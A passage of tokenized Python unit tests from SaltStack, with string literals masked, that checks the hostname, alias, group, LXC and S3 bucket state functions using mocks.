__salt__ , { '<STR_LIT>' : cmd_run_mock } ) : <EOL> with patch . object ( win_system , '<STR_LIT>' , get_hostname ) : <EOL> win_system . set_hostname ( "<STR_LIT>" ) <EOL> cmd_run_mock . assert_called_once_with ( cmd = "<STR_LIT>" ) <EOL> def test_get_hostname ( self ) : <EOL> '''<STR_LIT>''' <EOL> cmd_run_mock = MagicMock ( return_value = "<STR_LIT>" ) <EOL> with patch . dict ( win_system . __salt__ , { '<STR_LIT>' : cmd_run_mock } ) : <EOL> ret = win_system . get_hostname ( ) <EOL> self . assertEqual ( ret , "<STR_LIT>" ) <EOL> cmd_run_mock . assert_called_once_with ( cmd = "<STR_LIT>" ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> from integration import run_tests <EOL> run_tests ( WinSystemTestCase , needs_daemon = False ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> from salttesting import skipIf , TestCase <EOL> from salttesting . helpers import ensure_in_syspath <EOL> from salttesting . mock import ( <EOL> NO_MOCK , <EOL> NO_MOCK_REASON , <EOL> MagicMock , <EOL> patch <EOL> ) <EOL> ensure_in_syspath ( '<STR_LIT>' ) <EOL> from salt . states import alias <EOL> alias . __opts__ = { } <EOL> alias . __salt__ = { } <EOL> @ skipIf ( NO_MOCK , NO_MOCK_REASON ) <EOL> class AliasTest ( TestCase ) : <EOL> '''<STR_LIT>''' <EOL> def test_present_has_target ( self ) : <EOL> '''<STR_LIT>''' <EOL> name = '<STR_LIT>' <EOL> target = '<STR_LIT>' <EOL> ret = { '<STR_LIT>' : '<STR_LIT>' . format ( name ) , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT:name>' : name , <EOL> '<STR_LIT:result>' : True } <EOL> has_target = MagicMock ( return_value = True ) <EOL> with patch . dict ( alias . __salt__ , { '<STR_LIT>' : has_target } ) : <EOL> self . assertEqual ( alias . present ( name , target ) , ret ) <EOL> def test_present_has_not_target_test ( self ) : <EOL> '''<STR_LIT>''' <EOL> name = '<STR_LIT>' <EOL> target = '<STR_LIT>' <EOL> ret = { '<STR_LIT>' : '<STR_LIT>' . format ( name , target ) , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT:name>' : name , <EOL> '<STR_LIT:result>' : None } <EOL> has_target = MagicMock ( return_value = False ) <EOL> with patch . dict ( alias . __salt__ , { '<STR_LIT>' : has_target } ) : <EOL> with patch . dict ( alias . __opts__ , { '<STR_LIT:test>' : True } ) : <EOL> self . assertEqual ( alias . present ( name , target ) , ret ) <EOL> def test_present_set_target ( self ) : <EOL> '''<STR_LIT>''' <EOL> name = '<STR_LIT>' <EOL> target = '<STR_LIT>' <EOL> ret = { '<STR_LIT>' : '<STR_LIT>' . format ( name , target ) , <EOL> '<STR_LIT>' : { '<STR_LIT>' : name } , <EOL> '<STR_LIT:name>' : name , <EOL> '<STR_LIT:result>' : True } <EOL> has_target = MagicMock ( return_value = False ) <EOL> set_target = MagicMock ( return_value = True ) <EOL> with patch . 
dict ( alias . __salt__ , { '<STR_LIT>' : has_target } ) : <EOL> with patch . dict ( alias . __opts__ , { '<STR_LIT:test>' : False } ) : <EOL> with patch . dict ( alias . __salt__ , { '<STR_LIT>' : set_target } ) : <EOL> self . assertEqual ( alias . present ( name , target ) , ret ) <EOL> def test_present_set_target_failed ( self ) : <EOL> '''<STR_LIT>''' <EOL> name = '<STR_LIT>' <EOL> target = '<STR_LIT>' <EOL> ret = { '<STR_LIT>' : '<STR_LIT>' . format ( name , target ) , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT:name>' : name , <EOL> '<STR_LIT:result>' : False } <EOL> has_target = MagicMock ( return_value = False ) <EOL> set_target = MagicMock ( return_value = False ) <EOL> with patch . dict ( alias . __salt__ , { '<STR_LIT>' : has_target } ) : <EOL> with patch . dict ( alias . __opts__ , { '<STR_LIT:test>' : False } ) : <EOL> with patch . dict ( alias . __salt__ , { '<STR_LIT>' : set_target } ) : <EOL> self . assertEqual ( alias . present ( name , target ) , ret ) <EOL> def test_absent_already_gone ( self ) : <EOL> '''<STR_LIT>''' <EOL> name = '<STR_LIT>' <EOL> target = '<STR_LIT>' <EOL> ret = { '<STR_LIT>' : '<STR_LIT>' . format ( name ) , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT:name>' : name , <EOL> '<STR_LIT:result>' : True } <EOL> get_target = MagicMock ( return_value = False ) <EOL> with patch . dict ( alias . __salt__ , { '<STR_LIT>' : get_target } ) : <EOL> self . assertEqual ( alias . absent ( name ) , ret ) <EOL> def test_absent_not_gone_test ( self ) : <EOL> '''<STR_LIT>''' <EOL> name = '<STR_LIT>' <EOL> target = '<STR_LIT>' <EOL> ret = { '<STR_LIT>' : '<STR_LIT>' . format ( name ) , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT:name>' : name , <EOL> '<STR_LIT:result>' : None } <EOL> get_target = MagicMock ( return_value = True ) <EOL> with patch . dict ( alias . __salt__ , { '<STR_LIT>' : get_target } ) : <EOL> with patch . dict ( alias . __opts__ , { '<STR_LIT:test>' : True } ) : <EOL> self . assertEqual ( alias . 
absent ( name ) , ret ) <EOL> def test_absent_rm_alias ( self ) : <EOL> '''<STR_LIT>''' <EOL> name = '<STR_LIT>' <EOL> target = '<STR_LIT>' <EOL> ret = { '<STR_LIT>' : '<STR_LIT>' . format ( name ) , <EOL> '<STR_LIT>' : { '<STR_LIT>' : name } , <EOL> '<STR_LIT:name>' : name , <EOL> '<STR_LIT:result>' : True } <EOL> get_target = MagicMock ( return_value = True ) <EOL> rm_alias = MagicMock ( return_value = True ) <EOL> with patch . dict ( alias . __salt__ , { '<STR_LIT>' : get_target } ) : <EOL> with patch . dict ( alias . __opts__ , { '<STR_LIT:test>' : False } ) : <EOL> with patch . dict ( alias . __salt__ , { '<STR_LIT>' : rm_alias } ) : <EOL> self . assertEqual ( alias . absent ( name ) , ret ) <EOL> def test_absent_rm_alias_failed ( self ) : <EOL> '''<STR_LIT>''' <EOL> name = '<STR_LIT>' <EOL> target = '<STR_LIT>' <EOL> ret = { '<STR_LIT>' : '<STR_LIT>' . format ( name ) , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT:name>' : name , <EOL> '<STR_LIT:result>' : False } <EOL> get_target = MagicMock ( return_value = True ) <EOL> rm_alias = MagicMock ( return_value = False ) <EOL> with patch . dict ( alias . __salt__ , { '<STR_LIT>' : get_target } ) : <EOL> with patch . dict ( alias . __opts__ , { '<STR_LIT:test>' : False } ) : <EOL> with patch . dict ( alias . __salt__ , { '<STR_LIT>' : rm_alias } ) : <EOL> self . assertEqual ( alias . absent ( name ) , ret ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> from integration import run_tests <EOL> run_tests ( AliasTest , needs_daemon = False ) </s>
<s> from __future__ import absolute_import <EOL> from distutils . version import LooseVersion <EOL> from copy import deepcopy <EOL> import random <EOL> import string <EOL> from salttesting . unit import skipIf , TestCase <EOL> from salttesting . mock import NO_MOCK , NO_MOCK_REASON , patch <EOL> from salttesting . helpers import ensure_in_syspath <EOL> ensure_in_syspath ( '<STR_LIT>' ) <EOL> import salt . config <EOL> import salt . loader <EOL> import logging <EOL> from salttesting . mock import NO_MOCK , NO_MOCK_REASON , MagicMock , patch <EOL> from unit . modules . boto_s3_bucket_test import BotoS3BucketTestCaseMixin <EOL> try : <EOL> import boto <EOL> import boto3 <EOL> from botocore . exceptions import ClientError <EOL> HAS_BOTO = True <EOL> except ImportError : <EOL> HAS_BOTO = False <EOL> required_boto3_version = '<STR_LIT>' <EOL> log = logging . getLogger ( __name__ ) <EOL> opts = salt . config . DEFAULT_MINION_OPTS <EOL> context = { } <EOL> utils = salt . loader . utils ( opts , whitelist = [ '<STR_LIT>' ] , context = context ) <EOL> serializers = salt . loader . serializers ( opts ) <EOL> funcs = salt . loader . minion_mods ( opts , context = context , utils = utils , whitelist = [ '<STR_LIT>' ] ) <EOL> salt_states = salt . loader . states ( opts = opts , functions = funcs , utils = utils , whitelist = [ '<STR_LIT>' ] , serializers = serializers ) <EOL> def _has_required_boto ( ) : <EOL> '''<STR_LIT>''' <EOL> if not HAS_BOTO : <EOL> return False <EOL> elif LooseVersion ( boto3 . 
__version__ ) < LooseVersion ( required_boto3_version ) : <EOL> return False <EOL> else : <EOL> return True <EOL> if _has_required_boto ( ) : <EOL> region = '<STR_LIT>' <EOL> access_key = '<STR_LIT>' <EOL> secret_key = '<STR_LIT>' <EOL> conn_parameters = { '<STR_LIT>' : region , '<STR_LIT:key>' : access_key , '<STR_LIT>' : secret_key , '<STR_LIT>' : { } } <EOL> error_message = '<STR_LIT>' <EOL> not_found_error = ClientError ( { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : "<STR_LIT>" <EOL> } <EOL> } , '<STR_LIT>' ) <EOL> error_content = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : "<STR_LIT>" <EOL> } <EOL> } <EOL> list_ret = { <EOL> '<STR_LIT>' : [ { <EOL> '<STR_LIT:Name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : None <EOL> } ] , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } <EOL> } <EOL> config_in = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : [ { <EOL> '<STR_LIT>' : [ "<STR_LIT:GET>" ] , <EOL> '<STR_LIT>' : [ "<STR_LIT:*>" ] , <EOL> } ] , <EOL> '<STR_LIT>' : [ { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : <NUM_LIT:1> <EOL> } , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } ] , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ "<STR_LIT>" ] , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ { <EOL> '<STR_LIT:Name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:string>' <EOL> } ] <EOL> } <EOL> } <EOL> } ] <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : [ { <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : 
{ <EOL> '<STR_LIT>' : "<STR_LIT>" <EOL> } , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : "<STR_LIT>" <EOL> } ] <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ { <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : "<STR_LIT>" <EOL> } <EOL> } ] <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:a>' : '<STR_LIT:b>' , <EOL> '<STR_LIT:c>' : '<STR_LIT:d>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> } <EOL> } <EOL> config_ret = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } ] , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ { <EOL> '<STR_LIT>' : [ "<STR_LIT:GET>" ] , <EOL> '<STR_LIT>' : [ "<STR_LIT:*>" ] , <EOL> } ] <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : <NUM_LIT:1> <EOL> } , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } ] <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ "<STR_LIT>" ] , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' 
: [ { <EOL> '<STR_LIT:Name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:string>' <EOL> } ] <EOL> } <EOL> } <EOL> } ] <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ { <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : "<STR_LIT>" <EOL> } <EOL> } ] <EOL> } <EOL> } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ { <EOL> '<STR_LIT>' : '<STR_LIT:c>' , <EOL> '<STR_LIT>' : '<STR_LIT:d>' <EOL> } , { <EOL> '<STR_LIT>' : '<STR_LIT:a>' , <EOL> '<STR_LIT>' : '<STR_LIT:b>' , <EOL> } ] <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> } <EOL> } <EOL> bucket_ret = { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> class BotoS3BucketStateTestCaseBase ( TestCase ) : <EOL> conn = None <EOL> def setUp ( self ) : <EOL> context . clear ( ) <EOL> conn_parameters [ '<STR_LIT:key>' ] = '<STR_LIT>' . join ( random . choice ( string . ascii_lowercase + string . digits ) for _ in range ( <NUM_LIT:50> ) ) <EOL> self . patcher = patch ( '<STR_LIT>' ) <EOL> self . addCleanup ( self . patcher . stop ) <EOL> mock_session = self . patcher . start ( ) <EOL> session_instance = mock_session . return_value <EOL> self . conn = MagicMock ( ) <EOL> session_instance . client . return_value = self . conn <EOL> @ skipIf ( HAS_BOTO is False , '<STR_LIT>' ) <EOL> @ skipIf ( _has_required_boto ( ) is False , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> . 
format ( required_boto3_version ) ) <EOL> @ skipIf ( NO_MOCK , NO_MOCK_REASON ) <EOL> class BotoS3BucketTestCase ( BotoS3BucketStateTestCaseBase , BotoS3BucketTestCaseMixin ) : <EOL> '''<STR_LIT>''' <EOL> def test_present_when_bucket_does_not_exist ( self ) : <EOL> '''<STR_LIT>''' <EOL> self . conn . head_bucket . side_effect = [ not_found_error , None ] <EOL> self . conn . list_buckets . return_value = deepcopy ( list_ret ) <EOL> self . conn . create_bucket . return_value = bucket_ret <EOL> for key , value in config_ret . iteritems ( ) : <EOL> getattr ( self . conn , key ) . return_value = deepcopy ( value ) <EOL> with patch . dict ( funcs , { '<STR_LIT>' : MagicMock ( return_value = '<STR_LIT>' ) } ) : <EOL> result = salt_states [ '<STR_LIT>' ] ( <EOL> '<STR_LIT>' , <EOL> Bucket = '<STR_LIT>' , <EOL> ** config_in <EOL> ) <EOL> self . assertTrue ( result [ '<STR_LIT:result>' ] ) <EOL> self . assertEqual ( result [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] , config_ret [ '<STR_LIT>' ] ) <EOL> def test_present_when_bucket_exists_no_mods ( self ) : <EOL> self . conn . list_buckets . return_value = deepcopy ( list_ret ) <EOL> for key , value in config_ret . iteritems ( ) : <EOL> getattr ( self . conn , key ) . return_value = deepcopy ( value ) <EOL> with patch . dict ( funcs , { '<STR_LIT>' : MagicMock ( return_value = '<STR_LIT>' ) } ) : <EOL> result = salt_states [ '<STR_LIT>' ] ( <EOL> '<STR_LIT>' , <EOL> Bucket = '<STR_LIT>' , <EOL> ** config_in <EOL> ) <EOL> self . assertTrue ( result [ '<STR_LIT:result>' ] ) <EOL> self . assertEqual ( result [ '<STR_LIT>' ] , { } ) <EOL> def test_present_when_bucket_exists_all_mods ( self ) : <EOL> self . conn . list_buckets . return_value = deepcopy ( list_ret ) <EOL> for key , value in config_ret . iteritems ( ) : <EOL> getattr ( self . conn , key ) . return_value = deepcopy ( value ) <EOL> with patch . 
dict ( funcs , { '<STR_LIT>' : MagicMock ( return_value = '<STR_LIT>' ) } ) : <EOL> result = salt_states [ '<STR_LIT>' ] ( <EOL> '<STR_LIT>' , <EOL> Bucket = '<STR_LIT>' , <EOL> LocationConstraint = config_in [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertTrue ( result [ '<STR_LIT:result>' ] ) <EOL> self . assertNotEqual ( result [ '<STR_LIT>' ] , { } ) <EOL> def test_present_with_failure ( self ) : <EOL> self . conn . head_bucket . side_effect = [ not_found_error , None ] <EOL> self . conn . list_buckets . return_value = deepcopy ( list_ret ) <EOL> self . conn . create_bucket . side_effect = ClientError ( error_content , '<STR_LIT>' ) <EOL> with patch . dict ( funcs , { '<STR_LIT>' : MagicMock ( return_value = '<STR_LIT>' ) } ) : <EOL> result = salt_states [ '<STR_LIT>' ] ( <EOL> '<STR_LIT>' , <EOL> Bucket = '<STR_LIT>' , <EOL> ** config_in <EOL> ) <EOL> self . assertFalse ( result [ '<STR_LIT:result>' ] ) <EOL> self . assertTrue ( '<STR_LIT>' in result [ '<STR_LIT>' ] ) <EOL> def test_absent_when_bucket_does_not_exist ( self ) : <EOL> '''<STR_LIT>''' <EOL> self . conn . head_bucket . side_effect = [ not_found_error , None ] <EOL> result = salt_states [ '<STR_LIT>' ] ( '<STR_LIT:test>' , '<STR_LIT>' ) <EOL> self . assertTrue ( result [ '<STR_LIT:result>' ] ) <EOL> self . assertEqual ( result [ '<STR_LIT>' ] , { } ) <EOL> def test_absent_when_bucket_exists ( self ) : <EOL> result = salt_states [ '<STR_LIT>' ] ( '<STR_LIT:test>' , '<STR_LIT>' ) <EOL> self . assertTrue ( result [ '<STR_LIT:result>' ] ) <EOL> self . assertEqual ( result [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] , None ) <EOL> def test_absent_with_failure ( self ) : <EOL> self . conn . delete_bucket . side_effect = ClientError ( error_content , '<STR_LIT>' ) <EOL> result = salt_states [ '<STR_LIT>' ] ( '<STR_LIT:test>' , '<STR_LIT>' ) <EOL> self . assertFalse ( result [ '<STR_LIT:result>' ] ) <EOL> self . assertTrue ( '<STR_LIT>' in result [ '<STR_LIT>' ] ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> from salttesting import TestCase , skipIf <EOL> from salttesting . helpers import ensure_in_syspath <EOL> from salttesting . mock import ( <EOL> MagicMock , <EOL> patch , <EOL> NO_MOCK , <EOL> NO_MOCK_REASON <EOL> ) <EOL> ensure_in_syspath ( '<STR_LIT>' ) <EOL> from salt . states import group <EOL> group . __salt__ = { } <EOL> group . __opts__ = { } <EOL> @ skipIf ( NO_MOCK , NO_MOCK_REASON ) <EOL> class GroupTestCase ( TestCase ) : <EOL> '''<STR_LIT>''' <EOL> def test_present ( self ) : <EOL> '''<STR_LIT>''' <EOL> ret = { '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT:result>' : True , <EOL> '<STR_LIT>' : { } <EOL> } <EOL> ret . update ( { '<STR_LIT>' : '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:result>' : None } ) <EOL> self . assertDictEqual ( group . present ( "<STR_LIT>" , delusers = True , <EOL> members = True ) , ret ) <EOL> ret . update ( { '<STR_LIT>' : '<STR_LIT>' <EOL> '<STR_LIT>' } ) <EOL> self . assertDictEqual ( group . present ( "<STR_LIT>" , addusers = [ '<STR_LIT:a>' ] , <EOL> delusers = [ '<STR_LIT:a>' ] ) , ret ) <EOL> ret . update ( { '<STR_LIT>' : '<STR_LIT>' <EOL> '<STR_LIT>' } ) <EOL> mock = MagicMock ( side_effect = [ { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , False , False , False ] ) <EOL> with patch . object ( group , '<STR_LIT>' , mock ) : <EOL> with patch . dict ( group . __opts__ , { "<STR_LIT:test>" : True } ) : <EOL> self . assertDictEqual ( group . present ( "<STR_LIT>" ) , ret ) <EOL> ret . update ( { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . assertDictEqual ( group . present ( "<STR_LIT>" ) , ret ) <EOL> with patch . dict ( group . __opts__ , { "<STR_LIT:test>" : False } ) : <EOL> mock = MagicMock ( return_value = [ { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT:name>' : '<STR_LIT>' } ] ) <EOL> with patch . dict ( group . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> ret . 
update ( { '<STR_LIT:result>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> '<STR_LIT>' } ) <EOL> self . assertDictEqual ( group . present ( "<STR_LIT>" , <NUM_LIT:1> ) , ret ) <EOL> mock = MagicMock ( return_value = False ) <EOL> with patch . dict ( group . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> ret . update ( { '<STR_LIT>' : <EOL> '<STR_LIT>' } ) <EOL> self . assertDictEqual ( group . present ( "<STR_LIT>" ) , ret ) <EOL> def test_absent ( self ) : <EOL> '''<STR_LIT>''' <EOL> ret = { '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT:result>' : True , <EOL> '<STR_LIT>' : { } <EOL> } <EOL> mock = MagicMock ( side_effect = [ True , True , True , False ] ) <EOL> with patch . dict ( group . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> with patch . dict ( group . __opts__ , { "<STR_LIT:test>" : True } ) : <EOL> ret . update ( { '<STR_LIT:result>' : None , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . assertDictEqual ( group . absent ( "<STR_LIT>" ) , ret ) <EOL> with patch . dict ( group . __opts__ , { "<STR_LIT:test>" : False } ) : <EOL> mock = MagicMock ( side_effect = [ True , False ] ) <EOL> with patch . dict ( group . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> ret . update ( { '<STR_LIT:result>' : True , '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . assertDictEqual ( group . absent ( '<STR_LIT>' ) , ret ) <EOL> ret . update ( { '<STR_LIT>' : { } , '<STR_LIT:result>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . assertDictEqual ( group . absent ( '<STR_LIT>' ) , ret ) <EOL> ret . update ( { '<STR_LIT:result>' : True , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . assertDictEqual ( group . absent ( '<STR_LIT>' ) , ret ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> from integration import run_tests <EOL> run_tests ( GroupTestCase , needs_daemon = False ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> from salttesting import skipIf , TestCase <EOL> from salttesting . mock import ( <EOL> NO_MOCK , <EOL> NO_MOCK_REASON , <EOL> MagicMock , <EOL> patch ) <EOL> from salttesting . helpers import ensure_in_syspath <EOL> ensure_in_syspath ( '<STR_LIT>' ) <EOL> from salt . states import lxc <EOL> import salt . utils <EOL> lxc . __salt__ = { } <EOL> lxc . __opts__ = { } <EOL> @ skipIf ( NO_MOCK , NO_MOCK_REASON ) <EOL> class LxcTestCase ( TestCase ) : <EOL> '''<STR_LIT>''' <EOL> def test_present ( self ) : <EOL> '''<STR_LIT>''' <EOL> name = '<STR_LIT>' <EOL> ret = { '<STR_LIT:name>' : name , <EOL> '<STR_LIT:result>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { } } <EOL> mock = MagicMock ( side_effect = [ False , True , True , True , True , True , <EOL> True ] ) <EOL> mock_t = MagicMock ( side_effect = [ None , True , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> with patch . dict ( lxc . __salt__ , { '<STR_LIT>' : mock , <EOL> '<STR_LIT>' : mock_t } ) : <EOL> comt = ( "<STR_LIT>" ) <EOL> ret . update ( { '<STR_LIT>' : comt } ) <EOL> self . assertDictEqual ( lxc . present ( name , clone_from = True ) , ret ) <EOL> with patch . dict ( lxc . __opts__ , { '<STR_LIT:test>' : True } ) : <EOL> comt = ( "<STR_LIT>" ) <EOL> ret . update ( { '<STR_LIT>' : comt , '<STR_LIT:result>' : None } ) <EOL> self . assertDictEqual ( lxc . present ( name , clone_from = True ) , ret ) <EOL> comt = ( "<STR_LIT>" ) <EOL> ret . update ( { '<STR_LIT>' : comt , '<STR_LIT:result>' : True } ) <EOL> self . assertDictEqual ( lxc . present ( name , clone_from = True ) , ret ) <EOL> comt = ( "<STR_LIT>" ) <EOL> ret . update ( { '<STR_LIT>' : comt , '<STR_LIT:result>' : None } ) <EOL> self . assertDictEqual ( lxc . present ( name , running = True , <EOL> clone_from = True ) , ret ) <EOL> comt = ( '<STR_LIT>' . format ( name ) ) <EOL> ret . 
update ( { '<STR_LIT>' : comt , '<STR_LIT:result>' : None } ) <EOL> self . assertDictEqual ( lxc . present ( name , running = False , <EOL> clone_from = True ) , ret ) <EOL> comt = ( "<STR_LIT>" ) <EOL> ret . update ( { '<STR_LIT>' : comt , '<STR_LIT:result>' : True } ) <EOL> self . assertDictEqual ( lxc . present ( name , running = False , <EOL> clone_from = True ) , ret ) <EOL> with patch . dict ( lxc . __opts__ , { '<STR_LIT:test>' : False } ) : <EOL> comt = ( "<STR_LIT>" ) <EOL> ret . update ( { '<STR_LIT>' : comt , '<STR_LIT:result>' : True } ) <EOL> self . assertDictEqual ( lxc . present ( name , clone_from = True ) , ret ) <EOL> def test_absent ( self ) : <EOL> '''<STR_LIT>''' <EOL> name = '<STR_LIT>' <EOL> ret = { '<STR_LIT:name>' : name , <EOL> '<STR_LIT:result>' : True , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { } } <EOL> mock = MagicMock ( side_effect = [ False , True , True ] ) <EOL> mock_des = MagicMock ( return_value = { '<STR_LIT:state>' : True } ) <EOL> with patch . dict ( lxc . __salt__ , { '<STR_LIT>' : mock , <EOL> '<STR_LIT>' : mock_des } ) : <EOL> comt = ( '<STR_LIT>' . format ( name ) ) <EOL> ret . update ( { '<STR_LIT>' : comt } ) <EOL> self . assertDictEqual ( lxc . absent ( name ) , ret ) <EOL> with patch . dict ( lxc . __opts__ , { '<STR_LIT:test>' : True } ) : <EOL> comt = ( '<STR_LIT>' . format ( name ) ) <EOL> ret . update ( { '<STR_LIT>' : comt , '<STR_LIT:result>' : None } ) <EOL> self . assertDictEqual ( lxc . absent ( name ) , ret ) <EOL> with patch . dict ( lxc . __opts__ , { '<STR_LIT:test>' : False } ) : <EOL> comt = ( '<STR_LIT>' . format ( name ) ) <EOL> ret . update ( { '<STR_LIT>' : comt , '<STR_LIT:result>' : True , <EOL> '<STR_LIT>' : { '<STR_LIT:state>' : True } } ) <EOL> self . assertDictEqual ( lxc . 
